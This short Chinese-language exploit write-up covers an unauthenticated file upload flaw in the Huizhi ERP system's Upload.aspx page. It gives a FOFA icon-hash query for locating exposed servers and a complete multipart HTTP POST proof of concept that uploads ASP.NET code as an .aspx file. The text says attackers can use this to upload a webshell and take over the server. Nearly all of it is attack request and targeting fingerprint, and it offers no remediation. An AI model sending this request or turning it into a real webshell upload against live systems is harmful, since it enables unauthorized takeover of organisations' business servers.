# 汇智ERP系统Upload.aspx存在文件上传漏洞 汇智企业资源管理系统Upload.aspx存在文件上传漏洞,攻击者可未授权上传webshell木马文件获取服务器权限。 ## fofa ```yaml icon_hash="-642591392" ``` ## poc ```java POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1 Host: Content-Length: 1033 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryLkkAXATqVKBHZ8zk Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD ------WebKitFormBoundaryLkkAXATqVKBHZ8zk Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" 573D6CFB ------WebKitFormBoundaryLkkAXATqVKBHZ8zk Content-Disposition: form-data; name="upfile_Input" ------WebKitFormBoundaryLkkAXATqVKBHZ8zk Content-Disposition: form-data; name="upfile_upload"; filename="1" Content-Type: image/jpeg ASP.NET Web Forms Example <%@ Page Language="C#" %> <% Response.Write("hello,world"); %> ------WebKitFormBoundaryLkkAXATqVKBHZ8zk Content-Disposition: form-data; name="upfilename" 2.aspx ------WebKitFormBoundaryLkkAXATqVKBHZ8zk Content-Disposition: form-data; name="dnpostmethodname" uploadfile ------WebKitFormBoundaryLkkAXATqVKBHZ8zk-- ```